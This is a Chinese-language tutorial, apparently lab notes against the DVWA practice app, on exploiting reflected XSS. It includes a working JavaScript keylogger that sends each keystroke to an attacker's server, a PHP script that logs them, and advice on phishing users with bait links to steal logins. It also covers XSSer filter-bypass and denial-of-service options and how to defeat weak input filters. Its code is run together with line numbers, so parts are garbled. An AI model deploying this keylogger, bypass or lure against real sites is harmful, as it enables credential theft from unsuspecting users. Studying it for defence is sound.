XSS
原则上:只要XSS漏洞存在,可以编写任何功能的js脚本
【反射型漏洞利用】
键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上
服务器:kali客户端
启动apache2服务:service apache2 start
语法:
keylogger.js
1 document.onkeypress = function(evt) {2 evt = evt || window.event3 key = String.fromCharCode(evt.charCode)4 if(key) {5 var http = new XMLHttpRequest();6 var param = encodeURI(key)7 http.open("POST","http://192.168.1.127/keylogger.php",true);8 http.setRequestHeader("Content-type","application/x-www-form-urlencoded");9 http.send("key="+param);10 }11 }12 ~
keylogger.php【用来接受客户端提交上来的数据】
1 <?php2 $key=$_POST['key'];3 $logfile="keylog.txt";4 $fp = fopen($logfile,"a");5 fwrite($fp,$key);6 fclose($fp);7 >
为避免被引起用户怀疑,可将跳转命令置于html文件中
前提:用户已经登录网站,获得其cookie信息
#伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码
a.hmlt
1 ">诱人字眼
XSS利用工具
Xsser【专门针对XSS漏洞,使用python编写】
可使用图形化界面xsser --gtk【不建议使用,界面不够友好】
可绕过服务器端输入筛选【xss存在极其普遍】
1、编码10进制/16进制
2、函数:unecape()
简单使用语法:xsser -u "http://192.168.56.101/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low;PHPSESSID=31677b04bc31eac6cd78dbb1922e8028" -s -v --reverse-check
【GET:将对应页面和参数写进-g参数中;POST:使用-P;-s:统计请求数;-v:显示详细信息;--reverse-check:禁止提交hash值方式验证(此方法存在误判)】
--heuristic探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql}【所有过滤机制都是基于字符过滤】
对payload编码,绕过服务器短筛选过滤【过多编码可能造成语义误差】
1 *Select Bypasser(s)*:2 These options can be used to encode selected vector(s) to tryto3 bypass possible anti-XSS filters on target(s) code andpossible IPS4 rules, ifthe target use it. Also, can be combined with other5 techniques to provide encoding:6
7 --Str Use method String.FromCharCode()8 --Une Use Unescape() function9 --Mix Mix String.FromCharCode() andUnescape()10 --Dec Use Decimal encoding11 --Hex Use Hexadecimal encoding12 --Hes Use Hexadecimal encoding, with semicolons13 --Dwo Encode vectors IP addresses inDWORD14 --Doo Encode vectors IP addresses inOctal15 --Cem=CEM Try -manually-different Character Encoding Mutations16 (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
注入技术
1 *Special Technique(s)*:2 These options can be used to tryto inject code using different type3 of XSS techniques. You can choose multiple:4
5 --Coo COO -Cross Site Scripting Cookie injection6 --Xsa XSA -Cross Site Agent Scripting7 --Xsr XSR -Cross Site Referer Scripting8 --Dcp DCP -Data Control Protocol injections9 --Dom DOM -Document Object Model injections10 --Ind IND -HTTP Response Splitting Induced code11 --Anchor ANC -Use Anchor Stealth payloader (DOM shadows!)12 --Phpids PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
1 *Select Final injection(s)*:2 These options can be used to specify the final code to inject in
3 vulnerable target(s). Important, if you want to exploit on-the-wild4 your discovered vulnerabilities. Choose only one option:5
6 --Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
7 --Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
8 --Doss DOSs -XSS Denial of service (server) injection9 --Dos DOS -XSS Denial of service (client) injection10 --B64 B64 - Base64 code encoding inMETA tag (rfc2397)11
12 *Special Final injection(s)*:13 These options can be used to execute some 'special' injection(s) in
14 vulnerable target(s). You can select multiple andcombine with your15 final code (exceptwith DCP code):16
17 --Onm ONM -Use onMouseMove() event to inject code18 --Ifr IFR - Use source tag to inject code
源码分析
低安全级别【$_GET[]:直接回显输入的数据,不做任何过滤】
1 <?php2
3 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){4
5 $isempty = true;6
7 } else{8
9 echo '
';10 echo 'Hello ' . $_GET['name'];11 echo '
';12
13 }14
15 ?>
中安全级别【在输出时替换script为空,可拆分重整script为scriscriptpt】
1 <?php2
3 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){4
5 $isempty = true;6
7 } else{8
9 echo '
';10 echo 'Hello ' . str_replace('
';12
13 }14
15 ?>
高安全级别【htmlspecialchars():进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如】)】{可用burpsuite进行编码}
1 <?php2
3 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){4
5 $isempty = true;6
7 } else{8
9 echo '
';10 echo 'Hello ' . htmlspecialchars($_GET['name']);11 echo '
';12
13 }14
15 ?>
